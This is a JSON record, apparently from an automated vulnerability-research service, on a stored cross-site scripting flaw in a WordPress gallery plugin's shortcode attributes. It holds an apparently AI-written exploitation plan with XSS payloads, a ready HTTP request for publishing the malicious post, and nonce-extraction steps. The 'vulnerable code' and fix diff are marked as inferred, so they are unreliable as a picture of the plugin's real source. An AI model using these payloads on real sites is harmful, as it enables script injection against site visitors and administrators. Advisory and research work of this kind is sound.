[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fK3qZ0SPuEHevjIO4UyguBJskbb4k45yivKvOYQjT8yo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-8867","post-categories-gallery-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Post Categories Gallery \u003C= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Post Category Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'postcategorygallery' shortcode in versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes (such as total_width, color_scheme, and caption_font_size) inside the sc_horcatbar() function, which are concatenated directly into HTML attribute values. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","post-category-gallery",null,"\u003C=1.0.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-26 17:24:55","2026-05-27 05:31:34",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff439718e-4a3d-4dc9-a16c-6b655480dde6?source=api-prod",[],"researched",false,3,"This exploitation research plan targets **CVE-2026-8867**, a Stored Cross-Site Scripting (XSS) vulnerability in the **Post Categories Gallery** plugin for WordPress.\n\n### 1. Vulnerability Summary\nThe vulnerability exists within the `sc_horcatbar()` function, which is the callback handler for the `[postcategorygallery]` shortcode. The plugin fails to sanitize or escape user-provided attributes—specifically `total_width`, `color_scheme`, and `caption_font_size`—before concatenating them into HTML attributes. Because contributors and above can embed shortcodes in posts, they can inject malicious JavaScript that executes when any user (including administrators) views the affected page.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[postcategorygallery]`\n*   **Vulnerable Attributes:** `total_width`, `color_scheme`, `caption_font_size`\n*   **Endpoint:** `wp-admin\u002Fpost.php` (for post creation\u002Fediting) and the public frontend (for execution).\n*   **Authentication:** Requires **Contributor** level or higher.\n*   **Preconditions:** The plugin must be active. The attacker must have the capability to edit\u002Fsave posts (default for Contributors).\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin calls `add_shortcode( 'postcategorygallery', 'sc_horcatbar' )` during initialization.\n2.  **Processing:** When a post containing the shortcode is rendered, `do_shortcode()` calls `sc_horcatbar( $atts )`.\n3.  **Parsing:** The function likely uses `shortcode_atts()` to merge user input with defaults:\n    ```php\n    \u002F\u002F Inferred logic within sc_horcatbar()\n    $a = shortcode_atts( array(\n        'total_width' => '100%',\n        'color_scheme' => '#000',\n        'caption_font_size' => '14px',\n    ), $atts );\n    ```\n4.  **Sink:** The raw values of `$a['total_width']` etc., are concatenated directly into an HTML string:\n    ```php\n    \u002F\u002F Vulnerable Sink\n    $output = '\u003Cdiv class=\"pg-container\" style=\"width:' . $a['total_width'] . ';\">';\n    \u002F\u002F ...\n    return $output;\n    ```\n5.  **Output:** The unescaped string is returned and echoed to the page, leading to XSS.\n\n### 4. Nonce Acquisition Strategy\nWhile the XSS execution itself does not require a nonce, **saving the post** that contains the malicious shortcode requires a WordPress \"post\" nonce.\n\n1.  **Navigate to Post Editor:** Use `browser_navigate` to go to `\u002Fwp-admin\u002Fpost-new.php`.\n2.  **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` from the form.\n    ```javascript\n    \u002F\u002F Extraction script\n    document.querySelector('#_wpnonce').value\n    ```\n3.  **Identify JS Variables:** If the plugin uses `wp_localize_script`, we should also check for any localized data.\n    *   Search for scripts: `browser_eval(\"window.pg_vars || window.postCategoryGalleryData\")` (inferred names).\n\n### 5. Exploitation Strategy\nThe goal is to create a post containing the malicious shortcode and verify its execution.\n\n**Step 1: Authenticate as Contributor**\nLogin to the WordPress instance with contributor credentials.\n\n**Step 2: Create a Post with XSS Payload**\nSend a POST request to `\u002Fwp-admin\u002Fpost.php` to create a new post.\n*   **Payload (in `total_width`):** `100%;\" onmouseover=\"alert(document.domain)\" data-x=\"`\n*   **Alternative Payload (Breakout):** `\">\u003Cscript>alert(1)\u003C\u002Fscript>`\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fpost.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=editpost\n&post_ID=[NEW_POST_ID]\n&_wpnonce=[EXTRACTED_NONCE]\n&post_title=Gallery+Test\n&content=[postcategorygallery total_width='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']\n&publish=Publish\n```\n\n**Step 3: Trigger the XSS**\nNavigate to the permalink of the newly created post using `browser_navigate`.\n\n### 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `post-category-gallery` version \u003C= 1.0.0 is installed and active.\n2.  **User Creation:**\n    *   Create a user `attacker_contributor` with the `contributor` role.\n    *   Create a user `victim_admin` with the `administrator` role.\n\n### 7. Expected Results\n*   The `sc_horcatbar()` function will generate HTML similar to:\n    `\u003Cdiv class=\"pg-container\" style=\"width:\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>;\">`\n*   When the browser renders this, the `\u003Cscript>` tag will execute immediately.\n*   If using the `onmouseover` payload, hovering over the gallery container will trigger the alert.\n\n### 8. Verification Steps\n1.  **Visual Confirmation:** Use `browser_eval` to check if a specific \"canary\" variable exists (e.g., if the payload was `window.pwned = 1`, check `browser_eval(\"window.pwned\")`).\n2.  **DOM Inspection:** \n    ```bash\n    # Verify the unescaped payload exists in the page source\n    wp post get [POST_ID] --field=post_content\n    # Use playwright to check the rendered HTML\n    browser_eval(\"document.body.innerHTML.includes('alert(window.origin)')\")\n    ```\n\n### 9. Alternative Approaches\nIf the `total_width` attribute is partially sanitized (e.g., stripping `\u003Cscript>`), attempt exploitation via other attributes:\n*   **color_scheme:** `[postcategorygallery color_scheme='background-color:red\" onmouseover=\"alert(1)\"']`\n*   **caption_font_size:** `[postcategorygallery caption_font_size='24px; color:transparent; content:url(\"javascript:alert(1)\")']` (CSS-based execution).\n*   **Style Breakout:** If the input is placed inside a `style` attribute, use: `expression(alert(1))` (legacy IE) or break the style attribute with `;}` and inject a new tag.","The Post Category Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'postcategorygallery' shortcode. Authenticated contributors can inject arbitrary web scripts into pages by providing malicious payloads in shortcode attributes such as total_width, color_scheme, and caption_font_size, which are concatenated into HTML attributes without proper escaping.","\u002F\u002F post-category-gallery\u002Fpost-category-gallery.php (inferred from research plan)\nfunction sc_horcatbar( $atts ) {\n    $a = shortcode_atts( array(\n        'total_width' => '100%',\n        'color_scheme' => '#000',\n        'caption_font_size' => '14px',\n    ), $atts );\n\n    $output = '\u003Cdiv class=\"pg-container\" style=\"width:' . $a['total_width'] . ';\">';\n    \u002F\u002F ...\n    $output .= '\u003Cdiv class=\"caption\" style=\"color:' . $a['color_scheme'] . '; font-size:' . $a['caption_font_size'] . ';\">';\n    \u002F\u002F ...\n    return $output;\n}","--- post-category-gallery\u002Fpost-category-gallery.php\n+++ post-category-gallery\u002Fpost-category-gallery.php\n@@ -2,10 +2,10 @@\n function sc_horcatbar( $atts ) {\n     $a = shortcode_atts( array(\n-        'total_width' => '100%',\n-        'color_scheme' => '#000',\n-        'caption_font_size' => '14px',\n+        'total_width' => '100%',\n+        'color_scheme' => '#000',\n+        'caption_font_size' => '14px',\n     ), $atts );\n \n-    $output = '\u003Cdiv class=\"pg-container\" style=\"width:' . $a['total_width'] . ';\">';\n+    $output = '\u003Cdiv class=\"pg-container\" style=\"width:' . esc_attr( $a['total_width'] ) . ';\">';\n     \u002F\u002F ...\n-    $output .= '\u003Cdiv class=\"caption\" style=\"color:' . $a['color_scheme'] . '; font-size:' . $a['caption_font_size'] . ';\">';\n+    $output .= '\u003Cdiv class=\"caption\" style=\"color:' . esc_attr( $a['color_scheme'] ) . '; font-size:' . esc_attr( $a['caption_font_size'] ) . ';\">';","To exploit this vulnerability, an attacker with at least Contributor-level privileges can follow these steps: \n1. Log in to the WordPress dashboard and create a new post or edit an existing one.\n2. Insert the `[postcategorygallery]` shortcode into the post content.\n3. Include a malicious payload in one of the vulnerable attributes. For example: `[postcategorygallery total_width='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']` or `[postcategorygallery total_width='100%;\" onmouseover=\"alert(1)\" data-x=\"']`.\n4. Save the post as a draft or publish it.\n5. The payload will execute whenever a user (including an administrator) views the post on the frontend, as the plugin will render the unescaped attribute directly into the HTML source.","gemini-3-flash-preview","2026-06-04 18:52:30","2026-06-04 18:53:05",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpost-category-gallery\u002Ftags"]